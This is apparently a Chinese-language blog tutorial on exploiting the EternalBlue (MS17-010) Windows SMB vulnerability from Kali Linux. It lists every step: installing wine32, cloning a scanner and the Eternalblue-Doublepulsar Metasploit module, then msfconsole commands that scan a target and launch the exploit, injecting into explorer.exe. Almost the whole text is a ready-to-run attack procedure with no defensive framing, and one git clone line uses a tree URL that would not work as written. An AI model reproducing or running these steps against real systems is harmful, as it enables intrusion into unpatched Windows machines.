吐槽

永恒之蓝(EternalBlue)漏洞

1、升级kali-rolling
a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉;

b、更新 apt-get update && apt-get upgrade

2、安装wine32
root@kali:~ wine #提示未安装wine
dpkg –add-architecture i386
apt-get install wine32 && wine update
安装完成后会产生/root/.wine目录。
3、下载扫描模块(smb_ms17_010.rb)和攻击模块(Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb)
扫描模块:
git clone https://github.com/SwordWizard/metasploit-framework/tree/master/modules/auxiliary/scanner/smb/smb_ms17_010
攻击模块:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
将攻击模块解压,并将deps文件夹和eternalblue_doublepulsar.rb拷贝至/root/.msf/modules/exploits/windows/smb中;将扫描模块smb_ms17_010.rb拷贝至/root/.msf/modules/auxiliary/scanner/smb/中。
4、打开msf
msfconsole
msfupdate
5、加载扫描模块并设置
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS XXX.XXX.XXX.XXX
run
6、加载攻击模块
use exploits/windows/smb/eternalblue_doublepulsar
set RHOST XXX.XXX.XXX.XXX
set PROCESSINJECT explorer.exe
run